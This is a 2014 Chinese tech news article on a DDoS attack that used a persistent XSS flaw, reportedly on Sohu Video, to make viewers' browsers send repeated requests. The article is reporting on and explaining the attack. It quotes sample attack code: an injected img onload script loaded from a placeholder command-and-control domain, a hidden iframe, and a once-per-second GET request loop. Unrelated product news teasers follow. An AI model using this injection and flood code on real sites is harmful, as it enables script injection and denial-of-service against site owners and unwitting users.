首页 > 外闻 > 关键词  > DDos攻击最新资讯  > 正文

搜狐视频XSS漏洞遭利用 千万用户成DDOS肉鸡

2014-04-30 16:46 · 稿源:站长之家

站长之家(Chinaz.com)4月30日消息 昨日,日本CDN服务商Incapsula撰文,称其一位用户遭受了一起特殊的应用层DDos攻击(分布式拒绝服务攻击),本次攻击中黑客使用的是流量劫持技术。据统计,共有超过2.2万的网民通过浏览器向该用户的网站发起了约为2000万次的GET请求。这些网民都是在非自愿,甚至不知情的情况下成为“帮凶”的。

Incapsula官方表示不方便透露相关网站信息,且其技术团队已在积极需找解决方案,一旦问题得到解决,便会公布更多相关细节。而据白帽子技术社区的相关信息显示,本次攻击事件中被利用的那个网站便是全球网站流量排名27的搜狐视频。

此外,Incapsula在官博中也对黑客攻击所使用的技术进行了解说,大致如下:

在此次攻击事件中,黑客利用持久性XSS漏洞,通过个人资料中的头像设置在标签中注入了JS代码。这样一来,该图片每被使用一次,相关恶意代码便会传染一次,任何用户访问上述页面,都会自动执行被恶意注入的JS代码,从而触发了隐藏的

示例代码:

// JavaScript Injection in <img> tag enabled by Persistent XSS

<img src="/imagename.jpg" onload="$.getScript('https://c&cdomain.com/index.html')" />

// Malicious JavaScript opens hidden <iframe>

function ddos(url) {

$("body").append("<iframe id='ifr11323' style='display:none;' src='https://c&cdomain.com/index.html'></iframe>"); }

// Ajax DDoS tool in executes GET request every second

<html><body>

<h1>Iframe</h1>

<script>

ddos('https://upload.chinaz.com//', 'https://upload.chinaz.com/2014/0430/1398849165905.jpg');

function ddos(url,url2){

window.setInterval(function (){

$.getScript(url);

$.getScript(url2);

},1000)

}

</script>

</body></html>

被“控制”的用户每秒都会向受害人的网站发起一次请求。每秒一次看似没有多大影响,但如果一段视频30分钟来说,每个用户在看视频时都会发出1800次的请求,试想若是有成千上万的用户在观看视频的话,会如何呢?

举报

  • 相关推荐
  • 为什么你的客户总在悄悄流失? CRM系统到底怎么堵住这些漏洞?

    文章分析了中小企业客户管理的四大痛点:客户档案混乱、销售过程不透明、服务流程低效、决策缺乏数据支持。通过引入CRM系统,企业可实现客户信息整合、销售跟进自动化、服务流程标准化和流失预警。实际案例显示,使用CRM后客户完整度提升至92%,销售跟进及时率提高3.8倍,成功唤醒沉睡客户创造19.8万业绩。文章强调CRM是提升企业竞争力的必备工具,能有效解决客户流失问题。

  • 小米汽车:苹果授权Apple Music安卓版将陆续推送

    小米汽车高度重视苹果生态支持,调研发现SU7车主中超半数为苹果用户。针对苹果用户用车痛点,小米与苹果深度合作,通过系统级整合实现账号永久同步和无缝音乐续播,并特别适配授权版Apple Music安卓应用,提供无损音质体验。目前相关更新已通过OTA向全系车型推送,显著提升苹果用户的用车便捷性和音乐品质。

  • 基于通义万相 美图多款APP上线全新动漫特效、AI变身等视频生成功能

    今日,美图公司旗下美图秀秀、RoboNeo、Wink和开拍等多款产品,推出全新动漫特效、AI变身等视频生成功能。 据悉,新功能基于通义万相系列模型进行深度开发与训练,为美图的全球用户提供全新的创作体验。 近年来,美图加速布局生产力场景,不仅推出面向企业的AI算法服务和解决方案,旗下消费级产品也在快速集成大模型。 去年6月,美图就开始和阿里展开大模型合作。

  • Aqara智能隐形窗帘电机C200发布,首款原生支持Apple Home

    Aqara于9月10日发布智能隐形窗电机C200,为首款原生支持Apple Home的隐藏式智能窗帘。采用全嵌隐藏设计,可通过iPhone、Apple Watch等设备无缝控制,支持Siri语音、多场景自动化联动。提供一站式定制服务,含电机、轨道及高定窗帘布,适配多种窗型。内置大扭矩电机,承重达50kg,运行噪音低至29dB。现已线上线下开售,单电机版本499元起。

  • 忆联首款消费级QLC SSD AE531重磅发布!以超强可靠性与广泛兼容性,强力打造用户极致TCO

    忆联近日推出首款消费级QLC SSD产品AE531,基于QLC NAND技术,具备卓越生态兼容性与全生命周期成本优化。产品采用新一代控制器与智能IO加速模块,实现高达6800/5600MB/s顺序读写速度,性能媲美TLC产品。通过超低延迟架构、动态资源调度与持久性能保障三大核心技术,显著提升混合读写效率。支持国密加密算法,适配多平台操作系统,单位容量成本较TLC下降30%,功耗低于2.5mW。历经7000+项严苛测试验证,平均无故障工作时间超200万小时,为消费级PC、笔记本电脑等终端提供高性价比存储解决方案。

  • 三星正式向更多Galaxy设备推送Samsung One UI 8更新

    三星电子正式推送One UI 8更新,为Galaxy用户带来增强的多模态AI功能,包括个性化建议、实时窗口、即时简报等智能体验。新系统优化了不同设备形态的交互,结合Knox安全架构保护隐私,并支持实时翻译、游戏辅助等实用工具。9月18日起中国用户可优先升级,年底前将扩展至更多机型。

  • 目标安卓最强平板!荣耀MagicPad3 Pro全面对标iPad Pro、小米平板Ultra

    荣耀MagicPad3+Pro平板即将发布,将搭载第五代骁龙8至尊版芯片,配备13.3英寸超高刷大屏,首发MagicOS 10系统,支持PC级交互能力。对标iPad Pro和小米平板Ultra,目标成为安卓阵营最强平板。预计售价约5000元,因旗舰芯片成本较高。作为参考,荣耀MagicPad 3售价2999元起。

  • 旧款Apple Watch也将支持高血压警报:涉及这三款

    苹果在发布Apple Watch Series11与Ultra3两款新品之际,同步宣布了一项惠及旧款用户的重大更新——通过即将到来的watchOS26系统升级,Apple Watch Series9、Series10以及Ultra2三款旧机型也将新增高血压警报功能。这一举措意味着,部分持有旧款设备的用户无需更换新表,即可享受到这一前沿的健康监测服务。 watchOS26正式版定于9月15日正式向全球用户推送。新增的高血压警报功能依托于Appl

  • 安信证书双节钜惠:DigiCert OV SSL证书限时直降,立省1099元!

    安信证书推出中秋国庆双节特惠活动,DigiCert SSL证书限时优惠,最高直降1099元。涵盖四款OV企业型证书,包括基础版、高级版、通配符版及专业版,适用于不同企业网站安全需求。活动期间享免费安装、重签及到期提醒服务,助力企业低成本实现HTTPS加密升级。活动时间截至2025年10月20日,企业可前往官网优惠申请。

  • 苹果Apple Watch高血压通知功能上线

    苹果公司宣布将在全球150多个市场推出Apple Watch高血压通知功能,该功能将随watchOS 26和iOS 26系统更新正式推送。目前英国、法国、德国等地区用户已可体验,但加拿大等部分市场尚未开放,中国大陆地区仍需等待监管审批。该功能依托光学心率传感器,可实时监测用户血管对心跳的反应,识别慢性高血压迹象,并在检测到异常时发出提醒。系统会分析用户最近30天的数据,通过先进算法判断是否需要发出通知。

今日大家都在搜的词: